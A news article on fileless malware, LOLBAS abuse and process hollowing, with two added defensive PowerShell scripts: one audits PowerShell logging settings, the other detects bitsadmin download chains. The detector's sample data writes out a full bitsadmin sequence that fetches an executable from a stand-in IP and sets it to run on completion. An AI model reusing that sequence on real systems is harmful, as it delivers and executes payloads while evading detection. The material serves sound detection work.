Cybersecurity experts have recently observed a concerning trend in attack methodologies, with threat actors increasingly leveraging fileless techniques that weaponize PowerShell and legitimate Microsoft applications to deploy malware while evading detection. These attacks operate primarily in memory, leaving minimal forensic evidence on disk and bypassing security solutions that rely on file-based detection. According to recent security reports, approximately one-third of all attacks now employ fileless techniques, making them a prevalent threat in today's cyber landscape.

Rather than writing files to disk, attackers inject malicious code directly into running processes or use built-in Windows tools to execute their payloads, which makes detection exceedingly difficult for conventional security solutions. Particularly concerning is the growing abuse of Living Off The Land Binaries, Scripts and Libraries (LOLBAS), which involves repurposing legitimate Microsoft applications for malicious purposes. Because these trusted binaries are present and routinely used on every system, attackers use them to blend their activity with normal system operations, so that traditional security tools struggle to distinguish legitimate use from malicious abuse.

Process hollowing, a technique popularized by Stuxnet, involves launching a legitimate application in a suspended state, replacing its code in memory with malware, and then resuming execution, effectively hiding the malicious activity behind a trusted process name.

Security professionals recommend deploying endpoint detection and response (EDR) solutions with memory analysis capabilities, enabling PowerShell logging and monitoring, enforcing constrained language mode, and actively monitoring Active Directory for suspicious activity to defend against these threats.
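The two PowerShell-specific recommendations above (logging and constrained language mode) are easy to state and easy to get half-right. The following script is an added example, not code from the article or from any vendor mentioned in it: it audits the Group Policy registry values that switch on script block logging, module logging and transcription (with -Enforce it writes them), checks that 4104 script block events are actually arriving, and reports which language mode the current session received. The transcript directory C:\PSTranscripts is an assumed path; constrained language mode itself is granted by an AppLocker or WDAC policy, which this script only reports on, because there is no supported registry switch for it.

```powershell
# Added example (not from the article): audit, and with -Enforce apply, the
# PowerShell logging settings recommended for fileless-attack visibility.
# Run from an elevated prompt. The registry locations are the ones the
# equivalent Group Policy settings write; C:\PSTranscripts is an assumed path.
[CmdletBinding()]
param([switch]$Enforce)

$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$settings = @(
    # Script block logging: every executed block is written to event 4104,
    # including blocks that were obfuscated and then decoded in memory.
    @{ Key = "$base\ScriptBlockLogging";       Name = 'EnableScriptBlockLogging'; Value = 1 },
    # Module logging: pipeline execution details (event 4103) for all modules.
    @{ Key = "$base\ModuleLogging";            Name = 'EnableModuleLogging';      Value = 1 },
    @{ Key = "$base\ModuleLogging\ModuleNames"; Name = '*';                       Value = '*' },
    # Transcription: full session text to disk; protect the directory's ACL.
    @{ Key = "$base\Transcription";            Name = 'EnableTranscripting';      Value = 1 },
    @{ Key = "$base\Transcription";            Name = 'EnableInvocationHeader';   Value = 1 },
    @{ Key = "$base\Transcription";            Name = 'OutputDirectory';          Value = 'C:\PSTranscripts' }
)

foreach ($s in $settings) {
    # Read the whole key so a value literally named '*' is handled without wildcards.
    $props   = Get-ItemProperty -Path $s.Key -ErrorAction SilentlyContinue
    $current = if ($props) { $props.PSObject.Properties[$s.Name].Value } else { $null }
    $ok      = ($null -ne $current) -and ("$current" -eq "$($s.Value)")
    $status  = if ($ok) { 'OK' } else { 'MISSING' }
    '{0,-7} {1}\{2} = {3}' -f $status, $s.Key, $s.Name, $current

    if (-not $ok -and $Enforce) {
        if (-not (Test-Path $s.Key)) { New-Item -Path $s.Key -Force | Out-Null }
        $type = if ($s.Value -is [int]) { 'DWord' } else { 'String' }
        New-ItemProperty -Path $s.Key -Name $s.Name -Value $s.Value -PropertyType $type -Force | Out-Null
        "        -> set {0}\{1}" -f $s.Key, $s.Name
    }
}

# Settings are only useful if the events exist and are being collected.
$recent = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                       -MaxEvents 1 -ErrorAction SilentlyContinue
if ($recent) { "Latest 4104 script block event: $($recent.TimeCreated)" }
else         { 'WARNING: no 4104 events found; logging is not effective yet or the log was cleared' }

# Constrained Language Mode is what AppLocker/WDAC policy grants to this
# session; report it rather than pretending a registry value enforces it.
"Language mode of this session: $($ExecutionContext.SessionState.LanguageMode)"
```

Two caveats a practitioner will want: transcripts and 4104 events contain whatever the attacker typed, including credentials, so the output directory and the event log need restrictive ACLs and should be forwarded off the host, and an attacker who has administrative rights can simply delete these registry values, so the audit half of the script belongs in a scheduled or EDR-driven check rather than being run once.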
The bitsadmin commands seen in these attacks create Background Intelligent Transfer Service (BITS) jobs to retrieve malicious files and execute them, following a sequence that begins with bitsadmin /create and continues with further commands that configure the job and run the downloaded payload.
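The multi-step nature of that sequence is what makes it detectable: a single bitsadmin line looks like administration, but a job that is created, pointed at a remote URL, given a command to run on completion and then resumed is the LOLBAS pattern described above. The following function is an added example, not code from the article, that correlates bitsadmin invocations by job name across process-creation command lines and scores each job. The sample events are constructed for the example; the live-collection snippet at the end assumes Security event 4688 with the "Include command line in process creation events" policy enabled, where the command line is Properties[8].

```powershell
# Added example (not from the article): correlate bitsadmin job-creation chains
# across process-creation command lines. Input objects need Time and CommandLine.
function Get-BitsAdminJobIndicators {
    param([Parameter(Mandatory)][object[]]$Events)

    $jobs = @{}
    foreach ($e in $Events) {
        $cmd = $e.CommandLine
        if ($cmd -notmatch '(?i)\bbitsadmin(\.exe)?\b') { continue }
        # Verb of interest, optional switches such as /download, then the job name.
        if ($cmd -match '(?i)/(create|addfile|setnotifycmdline|resume|complete|transfer)\s+(?:/\S+\s+)*"?(?<job>[^"\s]+)"?') {
            $verb = $Matches[1].ToLower()
            $job  = $Matches['job']
            if (-not $jobs.ContainsKey($job)) {
                $jobs[$job] = [ordered]@{
                    Job    = $job
                    First  = $e.Time
                    Verbs  = [System.Collections.Generic.List[string]]::new()
                    Urls   = [System.Collections.Generic.List[string]]::new()
                    Notify = $null
                }
            }
            $j = $jobs[$job]
            $j.Verbs.Add($verb)
            foreach ($m in [regex]::Matches($cmd, '(?i)https?://\S+')) { $j.Urls.Add($m.Value) }
            # /SetNotifyCmdLine <job> <program> <args> runs <program> when the download completes.
            if ($verb -eq 'setnotifycmdline') {
                $j.Notify = ($cmd -split '(?i)/setnotifycmdline\s+\S+\s+', 2)[1]
            }
        }
    }

    foreach ($j in ($jobs.Values | Sort-Object First)) {
        $score = 0; $why = @()
        if ($j.Urls.Count -gt 0) { $score += 1; $why += 'fetches remote content' }
        if ($j.Urls | Where-Object { $_ -match '^https?://\d{1,3}(\.\d{1,3}){3}' }) { $score += 1; $why += 'IP-literal host' }
        if ($j.Notify) { $score += 3; $why += "runs '$($j.Notify)' on completion" }
        if ($j.Verbs -contains 'create' -and $j.Verbs -contains 'resume') { $score += 1; $why += 'multi-step job created and started' }
        $verdict = if ($score -ge 3) { 'SUSPICIOUS' } elseif ($score -gt 0) { 'review' } else { 'benign' }
        [pscustomobject]@{
            Job     = $j.Job
            First   = $j.First
            Steps   = ($j.Verbs -join ',')
            Urls    = ($j.Urls -join ' ')
            Score   = $score
            Verdict = $verdict
            Why     = ($why -join '; ')
        }
    }
}

# Constructed sample events for the example (not real telemetry).
$sample = @(
    [pscustomobject]@{ Time = '2025-03-03T10:00:01'; CommandLine = 'bitsadmin /create /download upd8' }
    [pscustomobject]@{ Time = '2025-03-03T10:00:02'; CommandLine = 'bitsadmin /addfile upd8 http://203.0.113.7/a.png C:\Users\Public\a.exe' }
    [pscustomobject]@{ Time = '2025-03-03T10:00:03'; CommandLine = 'bitsadmin /SetNotifyCmdLine upd8 C:\Users\Public\a.exe NULL' }
    [pscustomobject]@{ Time = '2025-03-03T10:00:04'; CommandLine = 'bitsadmin /resume upd8' }
    [pscustomobject]@{ Time = '2025-03-03T10:05:00'; CommandLine = 'bitsadmin /transfer wu https://download.windowsupdate.com/x.cab C:\Temp\x.cab' }
    [pscustomobject]@{ Time = '2025-03-03T10:06:00'; CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs' }
)
Get-BitsAdminJobIndicators -Events $sample | Format-Table -AutoSize

# Live use against Security 4688 (command-line auditing must be enabled; the
# command line is Properties[8] of a 4688 event):
# Get-BitsAdminJobIndicators -Events (
#     Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-24) } |
#         ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; CommandLine = $_.Properties[8].Value } })
```

On the sample data the upd8 job is reported as SUSPICIOUS (remote fetch from an IP-literal host, a /SetNotifyCmdLine payload, and a created-then-resumed job), while the wu transfer only earns a review flag for fetching remote content. The deliberate weakness to keep in mind is that the correlation key is the job name, so an attacker who fetches and executes in one /transfer line, or who splits the steps across different parent processes with different names, is caught only by the per-line indicators; pairing this with BITS client event logs (Microsoft-Windows-Bits-Client/Operational), which record job and URL independently of the command line, closes that gap.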
This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 03 Mar 2025 18:05:22 +0000